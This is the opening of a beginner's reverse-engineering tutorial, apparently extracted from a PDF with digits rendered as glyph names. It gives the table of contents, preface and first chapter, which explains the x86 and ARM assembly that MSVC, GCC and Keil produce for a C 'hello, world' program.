/one.pnum./nine.pnum switch()/case/default . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/five.pnum
/one.pnum./nine.pnum./one.pnum Few number of cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/five.pnum
/one.pnum./nine.pnum./two.pnum A lot of cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /three.pnum/eight.pnum
/one.pnum./one.pnum/zero.pnum Loops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum/four.pnum
/one.pnum./one.pnum/zero.pnum./one.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum/four.pnum
/one.pnum./one.pnum/zero.pnum./two.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum/six.pnum
/one.pnum./one.pnum/zero.pnum./three.pnum One more thing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum/eight.pnum
i
/one.pnum./one.pnum/one.pnum strlen() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum/nine.pnum
/one.pnum./one.pnum/one.pnum./one.pnum x/eight.pnum/six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /four.pnum/nine.pnum
/one.pnum./one.pnum/one.pnum./two.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /five.pnum/one.pnum
/one.pnum./one.pnum/two.pnum Division by /nine.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /five.pnum/four.pnum
/one.pnum./one.pnum/two.pnum./one.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /five.pnum/five.pnum
/one.pnum./one.pnum/three.pnum Work with FPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /five.pnum/seven.pnum
/one.pnum./one.pnum/three.pnum./one.pnum Simple example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /five.pnum/seven.pnum
/one.pnum./one.pnum/three.pnum./two.pnum Passing floating point number via arguments . . . . . . . . . . . . . . . . . . . . . . . . . /six.pnum/zero.pnum
/one.pnum./one.pnum/three.pnum./three.pnum Comparison example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /six.pnum/two.pnum
/one.pnum./one.pnum/four.pnum Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /seven.pnum/zero.pnum
/one.pnum./one.pnum/four.pnum./one.pnum Simple example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /seven.pnum/zero.pnum
/one.pnum./one.pnum/four.pnum./two.pnum Buffer overflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /seven.pnum/three.pnum
/one.pnum./one.pnum/four.pnum./three.pnum Buffer overflow protection methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /seven.pnum/six.pnum
/one.pnum./one.pnum/four.pnum./four.pnum One more word about arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /seven.pnum/nine.pnum
/one.pnum./one.pnum/four.pnum./five.pnum Multidimensional arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /seven.pnum/nine.pnum
/one.pnum./one.pnum/five.pnum Bit fields . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /eight.pnum/two.pnum
/one.pnum./one.pnum/five.pnum./one.pnum Specific bit checking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /eight.pnum/two.pnum
/one.pnum./one.pnum/five.pnum./two.pnum Specific bit setting/clearing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /eight.pnum/five.pnum
/one.pnum./one.pnum/five.pnum./three.pnum Shi/f_ts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /eight.pnum/eight.pnum
/one.pnum./one.pnum/five.pnum./four.pnum CRC/three.pnum/two.pnum calculation example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum/one.pnum
/one.pnum./one.pnum/six.pnum Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum/five.pnum
/one.pnum./one.pnum/six.pnum./one.pnum SYSTEMTIME example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum/five.pnum
/one.pnum./one.pnum/six.pnum./two.pnum Let’s allocate place for structure using malloc() . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum/seven.pnum
/one.pnum./one.pnum/six.pnum./three.pnum struct tm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /nine.pnum/nine.pnum
/one.pnum./one.pnum/six.pnum./four.pnum Fields packing in structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/zero.pnum/four.pnum
/one.pnum./one.pnum/six.pnum./five.pnum Nested structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/zero.pnum/six.pnum
/one.pnum./one.pnum/six.pnum./six.pnum Bit fields in structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/zero.pnum/seven.pnum
/one.pnum./one.pnum/seven.pnum C++ classes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/one.pnum/four.pnum
/one.pnum./one.pnum/seven.pnum./one.pnum Simple example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/one.pnum/four.pnum
/one.pnum./one.pnum/seven.pnum./two.pnum Class inheritance in C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/one.pnum/nine.pnum
/one.pnum./one.pnum/seven.pnum./three.pnum Encapsulation in C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/two.pnum/two.pnum
/one.pnum./one.pnum/seven.pnum./four.pnum Multiple inheritance in C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/two.pnum/four.pnum
/one.pnum./one.pnum/seven.pnum./five.pnum C++ virtual methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/two.pnum/eight.pnum
/one.pnum./one.pnum/eight.pnum Unions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum/one.pnum
/one.pnum./one.pnum/eight.pnum./one.pnum Pseudo-random number generator example . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum/one.pnum
/one.pnum./one.pnum/nine.pnum Pointers to functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum/three.pnum
/one.pnum./one.pnum/nine.pnum./one.pnum GCC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum/five.pnum
/one.pnum./two.pnum/zero.pnum SIMD . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum/seven.pnum
/one.pnum./two.pnum/zero.pnum./one.pnum Vectorization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/three.pnum/seven.pnum
/one.pnum./two.pnum/zero.pnum./two.pnum SIMD strlen() implementation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/four.pnum/three.pnum
/one.pnum./two.pnum/one.pnum /six.pnum/four.pnum bits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/four.pnum/seven.pnum
/one.pnum./two.pnum/one.pnum./one.pnum x/eight.pnum/six.pnum-/six.pnum/four.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/four.pnum/seven.pnum
/one.pnum./two.pnum/one.pnum./two.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/five.pnum/three.pnum
/one.pnum./two.pnum/two.pnum C/nine.pnum/nine.pnum restrict . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/five.pnum/four.pnum
/two.pnum Couple things to add /one.pnum/five.pnum/seven.pnum
/two.pnum./one.pnum LEA instruction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/five.pnum/eight.pnum
/two.pnum./two.pnum Function prologue and epilogue . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/five.pnum/nine.pnum
/two.pnum./three.pnum npad . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/zero.pnum
/two.pnum./four.pnum Signed number representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/two.pnum
/two.pnum./four.pnum./one.pnum Integer overflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/two.pnum
/two.pnum./five.pnum Arguments passing methods (calling conventions) . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/three.pnum
/two.pnum./five.pnum./one.pnum cdecl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/three.pnum
/two.pnum./five.pnum./two.pnum stdcall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/three.pnum
ii
/two.pnum./five.pnum./three.pnum fastcall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/three.pnum
/two.pnum./five.pnum./four.pnum thiscall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/four.pnum
/two.pnum./five.pnum./five.pnum x/eight.pnum/six.pnum-/six.pnum/four.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/four.pnum
/two.pnum./five.pnum./six.pnum Returning values of float and double type . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/four.pnum
/two.pnum./six.pnum position-independent code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/five.pnum
/three.pnum Finding important/interesting stuff in the code /one.pnum/six.pnum/eight.pnum
/three.pnum./one.pnum Communication with the outer world . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/eight.pnum
/three.pnum./two.pnum String . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/nine.pnum
/three.pnum./three.pnum Constants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/nine.pnum
/three.pnum./three.pnum./one.pnum Magic numbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/six.pnum/nine.pnum
/three.pnum./four.pnum Finding the right instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/zero.pnum
/three.pnum./five.pnum Suspicious code patterns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/one.pnum
/three.pnum./six.pnum Magic numbers usage while tracing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/two.pnum
/three.pnum./seven.pnum Old-school methods, nevertheless, interesting to know . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/two.pnum
/three.pnum./seven.pnum./one.pnum Memory “snapshots” comparing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/two.pnum
/four.pnum Tasks /one.pnum/seven.pnum/three.pnum
/four.pnum./one.pnum Easy level . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/three.pnum
/four.pnum./one.pnum./one.pnum Task /one.pnum./one.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/three.pnum
/four.pnum./one.pnum./two.pnum Task /one.pnum./two.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/four.pnum
/four.pnum./one.pnum./three.pnum Task /one.pnum./three.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/six.pnum
/four.pnum./one.pnum./four.pnum Task /one.pnum./four.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/seven.pnum
/four.pnum./one.pnum./five.pnum Task /one.pnum./five.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/seven.pnum/nine.pnum
/four.pnum./one.pnum./six.pnum Task /one.pnum./six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/zero.pnum
/four.pnum./one.pnum./seven.pnum Task /one.pnum./seven.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/one.pnum
/four.pnum./one.pnum./eight.pnum Task /one.pnum./eight.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/two.pnum
/four.pnum./one.pnum./nine.pnum Task /one.pnum./nine.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/two.pnum
/four.pnum./one.pnum./one.pnum/zero.pnum Task /one.pnum./one.pnum/zero.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/three.pnum
/four.pnum./two.pnum Middle level . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/three.pnum
/four.pnum./two.pnum./one.pnum Task /two.pnum./one.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/eight.pnum/three.pnum
/four.pnum./three.pnum crackme / keygenme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/zero.pnum
/five.pnum Tools /one.pnum/nine.pnum/one.pnum
/five.pnum./zero.pnum./one.pnum Debugger . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/one.pnum
/six.pnum Books/blogs worth reading /one.pnum/nine.pnum/two.pnum
/six.pnum./one.pnum Books . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/six.pnum./one.pnum./one.pnum Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/six.pnum./one.pnum./two.pnum C/C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/six.pnum./one.pnum./three.pnum x/eight.pnum/six.pnum / x/eight.pnum/six.pnum-/six.pnum/four.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/six.pnum./one.pnum./four.pnum ARM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/six.pnum./two.pnum Blogs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/six.pnum./two.pnum./one.pnum Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/two.pnum
/seven.pnum More examples /one.pnum/nine.pnum/three.pnum
/seven.pnum./one.pnum “QR/nine.pnum”: Rubik’s cube inspired amateur crypto-algorithm . . . . . . . . . . . . . . . . . . . . . . . . /one.pnum/nine.pnum/three.pnum
/seven.pnum./two.pnum SAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/two.pnum/one.pnum
/seven.pnum./two.pnum./one.pnum About SAP client network traffic compression . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/two.pnum/one.pnum
/seven.pnum./two.pnum./two.pnum SAP /six.pnum./zero.pnum password checking functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/three.pnum/two.pnum
/seven.pnum./three.pnum Oracle RDBMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/three.pnum/five.pnum
/seven.pnum./three.pnum./one.pnumV$VERSION table in Oracle RDBMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/three.pnum/five.pnum
/seven.pnum./three.pnum./two.pnumX$KSMLRU table in Oracle RDBMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/four.pnum/three.pnum
/seven.pnum./three.pnum./three.pnumV$TIMER table in Oracle RDBMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/four.pnum/five.pnum
iii
/eight.pnum Other things /two.pnum/four.pnum/nine.pnum
/eight.pnum./one.pnum Compiler’s anomalies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/four.pnum/nine.pnum
/nine.pnum Tasks solutions /two.pnum/five.pnum/zero.pnum
/nine.pnum./one.pnum Easy level . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/zero.pnum
/nine.pnum./one.pnum./one.pnum Task /one.pnum./one.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/zero.pnum
/nine.pnum./one.pnum./two.pnum Task /one.pnum./two.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/zero.pnum
/nine.pnum./one.pnum./three.pnum Task /one.pnum./three.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/zero.pnum
/nine.pnum./one.pnum./four.pnum Task /one.pnum./four.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/one.pnum
/nine.pnum./one.pnum./five.pnum Task /one.pnum./five.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/one.pnum
/nine.pnum./one.pnum./six.pnum Task /one.pnum./six.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/two.pnum
/nine.pnum./one.pnum./seven.pnum Task /one.pnum./seven.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/two.pnum
/nine.pnum./one.pnum./eight.pnum Task /one.pnum./eight.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/three.pnum
/nine.pnum./one.pnum./nine.pnum Task /one.pnum./nine.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/three.pnum
/nine.pnum./two.pnum Middle level . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/four.pnum
/nine.pnum./two.pnum./one.pnum Task /two.pnum./one.pnum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/four.pnum
A/f_terword /two.pnum/five.pnum/nine.pnum
/nine.pnum./three.pnum Donate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/nine.pnum
/nine.pnum./four.pnum Questions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . /two.pnum/five.pnum/nine.pnum
Bibliography /two.pnum/six.pnum/zero.pnum
Index /two.pnum/six.pnum/one.pnum
iv
Preface
Here (will be) some of my notes about reverse engineering in English language for those beginners who like to
learn to understand x/eight.pnum/six.pnum (which is a most large mass of all executable so/f_tware in the world) and ARM code created
by C/C++ compilers.
There are two most used assembly language syntax: Intel (most used in DOS/Windows) and AT&T (used in
*NIX)/one.pnum. Here we use Intel syntax. IDA /five.pnum produce Intel syntax listings too.
/one.pnumhttp://en.wikipedia.org/wiki/X86_assembly_language#Syntax
v
About author
Dennis Yurichev is experienced reverse engineering, available for hire as reverse engineer, consultant, trainer. His
CV is available here.
vi
Thanks
Andrey ”herm/one.pnumt” Baranovich, Slava ”Avid” Kazakov, Stanislav ”Beaver” Bobrytskyy, Alexander Lysenko, Alexander
”Lstar” Chernenkiy, Arnaud Patard (rtp on #debian-arm IRC).
vii
Chapter /one.pnum
Compiler’s patterns
When I first learn C and then C++, I was just writing small pieces of code, compiling it and see what is producing
in assembly language, that was an easy way to me. I did it a lot times and relation between C/C++ code and what
compiler produce was imprinted in my mind so deep so that I can quickly understand what was in C code when I
look at produced x/eight.pnum/six.pnum code. Perhaps, this method may be helpful for anyone else, so I’ll try to describe here some
examples.
/one.pnum
/one.pnum./one.pnum Hello, world!
Let’s start with famous example from the book “The C programming Language” [Ker/eight.pnum/eight.pnum]:
#include <stdio.h>
int main()
{
printf("hello, world");
return 0;
};
/one.pnum./one.pnum./one.pnum x/eight.pnum/six.pnum
MSVC
Let’s compile it in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum: cl 1.cpp /Fa1.asm
(/Fa option mean generate assembly listing file)
Listing /one.pnum./one.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
CONST SEGMENT
$SG3830 DB ’hello, world’, 00H
CONST ENDS
PUBLIC _main
EXTRN _printf:PROC
; Function compile flags: /Odtp
_TEXT SEGMENT
_main PROC
push ebp
mov ebp, esp
push OFFSET $SG3830
call _printf
add esp, 4
xor eax, eax
pop ebp
ret 0
_main ENDP
_TEXT ENDS
Compiler generated 1.obj file which will be linked into 1.exe .
In our case, the file contain two segments: CONST (for data constants) and _TEXT (for code).
The string “hello, world” in C/C++ has type const char* , however hasn’t its own name.
But compiler need to work with the string somehow, so it define internal name $SG3830 for it.
As we can see, the string is terminated by zero byte — it’s C/C++ standard for strings.
In the code segment _TEXT there are only one function so far — main() .
Function main() starting with prologue code and ending with epilogue code, like almost any function.
Read more about it in section about function prolog and epilog /two.pnum./two.pnum.
A/f_ter function prologue we see a function printf() call:CALL _printf .
Before the call, string address (or pointer to it) containing our greeting is placed into stack with help of PUSH
instruction.
Whenprintf() function returning control flow to main() function, string address (or pointer to it) is still in
stack.
Because we do not need it anymore, stack pointer ( ESPregister) is to be corrected.
ADD ESP, 4 mean add /four.pnum to the value in ESPregister.
Why /four.pnum? Since it is /three.pnum/two.pnum-bit code, we need exactly /four.pnum bytes for address passing through the stack. It’s /eight.pnum bytes in
x/six.pnum/four.pnum-code
“ADD ESP, 4” is equivalent to “POP register” but without any register usage/one.pnum.
/one.pnumCPU flags, however, modified
/two.pnum
Some compilers like Intel C++ Compiler, at the same point, could emit POP ECX instead of ADD(for example,
such pattern can be observed in Oracle RDBMS code, compiled by Intel C++ compiler), and this instruction has
almost the same effect, but ECXregister contents will be rewritten.
Probably, Intel C++ compiler using POP ECX because this instruction’s opcode is shorter then ADD ESP, x (/one.pnum
byte against /three.pnum).
Read more about stack in relevant section /one.pnum./two.pnum.
A/f_terprintf() call, in original C/C++ code was return 0 — return zero as a main() function result.
In the generated code this is implemented by instruction XOR EAX, EAX
XOR, in fact, just “eXclusive OR”/two.pnum, but compilers using it o/f_ten instead of MOV EAX, 0 — slightly shorter opcode
again (/two.pnum bytes against /five.pnum).
Some compilers emitting SUB EAX, EAX , which mean SUBtract EAX value from EAX, which is in any case will
result zero.
Last instruction RETreturning control flow to calling function. Usually, it’s C/C++ CRT/three.pnumcode, which, in turn,
return control to operation system.
GCC
Now let’s try to compile the same C/C++ code in GCC /four.pnum./four.pnum./one.pnum compiler in Linux: gcc 1.c -o 1
A/f_ter, with the IDA /five.pnum disassembler assistance, let’s see how main() function was created.
Note: we could also see GCC assembler result applying option -S -masm=intel
Listing /one.pnum./two.pnum: GCC
main proc near
var_10 = dword ptr -10h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 10h
mov eax, offset aHelloWorld ; "hello, world"
mov [esp+10h+var_10], eax
call _printf
mov eax, 0
leave
retn
main endp
Almost the same. Address of “hello world” string (stored in data segment) is saved in EAXregister first, then it
stored into stack. Also, in function prologue we see AND ESP, 0FFFFFFF0h — this instruction aligning ESPvalue
on /one.pnum/six.pnum-byte border, resulting all values in stack aligned too (CPU performing better if values it working with are
located in memory at addresses aligned by /four.pnum or /one.pnum/six.pnum byte border)/four.pnum.
SUB ESP, 10h allocate /one.pnum/six.pnum bytes in stack, although, as we could see below, only /four.pnum need here.
This is because the size of allocated stack is also aligned on /one.pnum/six.pnum-byte border.
String address (or pointer to string) is then writing directly into stack space without PUSH instruction use.
var_/one.pnum/zero.pnum — is local variable, but also argument for printf() . Read below about it.
Thenprintf() function is called.
Unlike MSVC, GCC while compiling without optimization turned on, emitting MOV EAX, 0 instead of shorter
opcode.
The last instruction LEAVE — isMOV ESP, EBP andPOP EBP instructions pair equivalent — in other words, this
instruction setting back stack pointer ( ESP) andEBPregister to its initial state.
This is necessary because we modified these register values ( ESPandEBP) at the function start (executing MOV
EBP, ESP /AND ESP, ... ).
/two.pnumhttp://en.wikipedia.org/wiki/Exclusive_or
/three.pnumC Run-Time Code
/four.pnumWikipedia: Data structure alignment
/three.pnum
/one.pnum./one.pnum./two.pnum ARM
For my experiments with ARM CPU I choose two compilers: popular in embedded area Keil Release /six.pnum//two.pnum/zero.pnum/one.pnum/three.pnum and
Apple Xcode /four.pnum./six.pnum./three.pnum IDE (with LLVM-GCC /four.pnum./two.pnum compiler), producing code for ARM-comptaible processors and SoCs/five.pnumin
iPod/iPhone/iPad, Windows /eight.pnum and Window RT tables/six.pnumand also such devices as Raspberry Pi.
Non-optimizing Keil + ARM mode
Let’s start by compiling our example in Keil:
armcc.exe --arm --c90 -O0 1.c
armcc compiler producing assembly listing, but it has some high-level ARM-processor related macros/seven.pnum, but it’s
more important for us to see instructions “as is” , so let’s see compiled results in IDA /five.pnum.
Listing /one.pnum./three.pnum: Non-optimizing Keil + ARM mode + IDA /five.pnum
.text:00000000 main
.text:00000000 10 40 2D E9 STMFD SP!, {R4,LR}
.text:00000004 1E 0E 8F E2 ADR R0, aHelloWorld ; "hello, world"
.text:00000008 15 19 00 EB BL __2printf
.text:0000000C 00 00 A0 E3 MOV R0, #0
.text:00000010 10 80 BD E8 LDMFD SP!, {R4,PC}
.text:000001EC 68 65 6C 6C+aHelloWorld DCB "hello, world",0 ; DATA XREF: main+4
Here is couple of ARM-related facts we should know in order to proceed. ARM processor has at least two major
modes: ARM mode and thumb. In first (ARM) mode all instructions are enabled and each has /three.pnum/two.pnum-bit (/four.pnum bytes) size.
In second (thumb) mode each instruction has /one.pnum/six.pnum-bit (or /two.pnum bytes) size/eight.pnum. Thumb mode may look attractive because
program in it may be /one.pnum) compact; /two.pnum) executing faster on microcontroller having /one.pnum/six.pnum-bit memory datapath. Nothing
come for free of charge, so, in thumb mode there are reduced instruction set, only /eight.pnum registers are accessible and
one need several thumb instructions for doing some operations when in ARM mode you’ll need just one. Starting
at ARMv/seven.pnum, there are also thumb-/two.pnum instructions set present, this is a thumb extended to support much bigger in-
structions set. There is a common misconception that thumb-/two.pnum is a mix of ARM and thumb. It’s not correct. But
rather thumb-/two.pnum was extended to support processor features so fully, so now it can compete with ARM mode. A
program for ARM processor may be mix of procedures compiled for both modes. Majority of iPod/iPhone/iPad
applications are compiled for thumb-/two.pnum instructions set, because Xcode do this by default.
In example we see here we can easily see that each instruction has size of /four.pnum bytes. Indeed, we compiled our
code for ARM mode, but for thumb.
The very first instruction ”STMFD SP!, {R4,LR}”/nine.pnumworks here as PUSH in x/eight.pnum/six.pnum, instruction, writing values of two
(R4andLR) registers into stack. Indeed, in output listing, armcc compiler, for the sake of simplification, showing
here”PUSH {r4,lr}” instruction. But it’s not quite correct, PUSH instruction available only in thumb mode, so, to
